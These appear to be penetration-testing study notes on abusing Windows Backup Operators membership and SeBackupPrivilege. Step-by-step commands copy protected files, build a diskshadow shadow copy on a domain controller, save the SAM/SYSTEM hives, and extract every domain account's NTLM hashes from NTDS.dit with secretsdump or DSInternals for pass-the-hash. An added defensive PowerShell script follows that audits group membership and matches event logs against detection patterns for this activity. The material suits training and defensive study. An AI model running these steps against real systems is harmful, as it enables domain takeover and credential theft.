
Backup Operators

  • built-in groups - https://ss64.com/nt/syntax-security_groups.html
  • privileged accounts and groups - https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-b--privileged-accounts-and-groups-in-active-directory

Windows Built-in Groups to focus on

Backup Operators

  • Main trick - https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/
  • Check privileges
    • whoami /groups (or net user _USERNAME_) and look for Backup Operators in the group list
      • Membership of Backup Operators grants SeBackupPrivilege and SeRestorePrivilege
      • SeBackupPrivilege allows us to traverse any folder and list its contents
        • This allows us to copy any file or folder, even if the ACLs don't permit us to.
      • A normal copy won't work: the data has to be copied programmatically, opening the file with the FILE_FLAG_BACKUP_SEMANTICS flag so that the privilege is honoured.
  • Download the PoC - https://github.com/giuliano108/SeBackupPrivilege
  • Import Libraries
    • Import-Module .\SeBackupPrivilegeUtils.dll
    • Import-Module .\SeBackupPrivilegeCmdLets.dll
  • Verifying SeBackupPrivilege is enabled (might require an elevated shell)
    • whoami /priv
    • Set-SeBackupPrivilege (enables the privilege on the current token)
    • Get-SeBackupPrivilege (confirms it is enabled)
  • Checking access
    • Now we can cd into any folder, but we still can't cat a file: cat is a normal read, not a backup-semantics read
  • Copying a file
    • Copy-FileSeBackupPrivilege 'C:\Confidential\2021 Contract.txt' .\Contract.txt
    • cat .\Contract.txt
      • now we can see the contents
  • NOTE: If a folder or file has an explicit deny entry for our current user or a group they belong to, this will prevent us from accessing it, even if the FILE_FLAG_BACKUP_SEMANTICS flag is specified.

Attacking a Domain Controller - Copying NTDS.dit

  • The AD database, NTDS.dit, is a very attractive target: it contains the NTLM hashes for every user and computer object in the domain.
  • But this file is locked while AD is running, and it is not accessible to unprivileged users anyway.
  • Use the diskshadow utility to create a shadow copy of the C: drive and expose it as the E: drive; the NTDS.dit inside the shadow copy is not in use by the system, so it can be copied.
  • Creating a shadow copy of C
    • diskshadow.exe
    • DISKSHADOW> set verbose on
    • DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
    • DISKSHADOW> set context persistent
    • DISKSHADOW> begin backup
    • DISKSHADOW> add volume C: alias cdrive
    • DISKSHADOW> create
    • DISKSHADOW> expose %cdrive% E:
    • DISKSHADOW> end backup
    • DISKSHADOW> exit
    • dir E:
  • Copying NTDS.dit locally
    • Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit
    • From cmd.exe, also save the SYSTEM hive (it holds the boot key needed to decrypt the database) and the SAM hive:
    • reg save HKLM\SYSTEM SYSTEM.SAV
    • reg save HKLM\SAM SAM.SAV
  • Extracting Credentials from NTDS.dit
    • Done with a tool such as secretsdump.py or the PowerShell DSInternals module, either of which extracts all Active Directory account credentials from the copied database
    • Using DSInternals
      • Import-Module .\DSInternals.psd1
      • $key = Get-BootKey -SystemHivePath .\SYSTEM
      • Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\ntds.dit -BootKey $key
    • Using secretsdump
      • secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
    • Both tools output NTLM hashes, which can be used for pass-the-hash or cracked offline later

Robocopy

Copying Files with Robocopy

  • Robocopy's /B switch copies files in backup mode, which relies on the same SeBackupPrivilege, so the PoC cmdlets are not required
  • After diskshadow has exposed the shadow copy as E:
    • robocopy /B E:\Windows\NTDS .\ntds ntds.dit
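As an added defensive example, not taken from the original notes or the PoC project, this PowerShell script audits who holds SeBackupPrivilege through Backup Operators and searches the Security log for the activity described in the sections above (SeBackupPrivilege logons, diskshadow, reg save of SAM/SYSTEM, robocopy /B). The allow-list name, the seven-day window and the assumption that process creation auditing with command-line logging is enabled are all assumptions.

```powershell
# Added defensive example, not from the original notes: audit who holds SeBackupPrivilege
# through Backup Operators, and look in the Security log for the activity the notes describe
# (SeBackupPrivilege logons, diskshadow.exe, reg save of SAM/SYSTEM, robocopy /B).
# Assumptions: elevated shell, RSAT ActiveDirectory module present, and process creation
# auditing (Event ID 4688) with command-line logging enabled.
$approved = @('svc_backup')          # placeholder allow-list of sanctioned backup accounts
$since    = (Get-Date).AddDays(-7)

# 1. Membership audit: domain group with nested groups expanded, then the local group.
Write-Host "== Domain Backup Operators (recursive) =="
Get-ADGroupMember -Identity 'Backup Operators' -Recursive | ForEach-Object {
    $tag = if ($approved -contains $_.SamAccountName) { 'ok    ' } else { 'REVIEW' }
    '{0} {1,-14} {2}' -f $tag, $_.objectClass, $_.distinguishedName
}
Write-Host "== Local Backup Operators =="
Get-LocalGroupMember -Group 'Backup Operators' -ErrorAction SilentlyContinue |
    ForEach-Object { '{0,-8} {1}' -f $_.ObjectClass, $_.Name }

# 2. Event 4672 records the privileges present on a new logon token; property indices
#    follow its schema (1 = SubjectUserName, 2 = SubjectDomainName, 4 = PrivilegeList).
Write-Host "== Logons granted SeBackupPrivilege since $since =="
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4672; StartTime=$since} -ErrorAction SilentlyContinue |
    Where-Object { $_.Properties[4].Value -match 'SeBackupPrivilege' } |
    ForEach-Object { '{0}\{1}' -f $_.Properties[2].Value, $_.Properties[1].Value } |
    Sort-Object -Unique

# 3. Event 4688 process creations (5 = NewProcessName, 8 = CommandLine). Every hit should map
#    to a scheduled backup job; diskshadow exposing a volume, or reg save of SAM/SYSTEM, from
#    an interactive session on a domain controller is what to escalate.
$pattern = 'diskshadow\.exe|reg\.exe.*\bsave\b.*\\(SAM|SYSTEM)\b|robocopy\.exe.*\s/B\b'
Write-Host "== Process creations matching backup-abuse tooling since $since =="
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688; StartTime=$since} -ErrorAction SilentlyContinue |
    ForEach-Object {
        $line = '{0} {1}' -f $_.Properties[5].Value, $_.Properties[8].Value
        if ($line -match $pattern) {
            '{0:u}  {1}\{2}  {3}' -f $_.TimeCreated, $_.Properties[2].Value, $_.Properties[1].Value, $line
        }
    }
```

Run it on domain controllers first, since that is where a copied NTDS.dit matters; 4672 is noisy on any host where administrators log on, so the membership audit and the 4688 matches are the actionable parts.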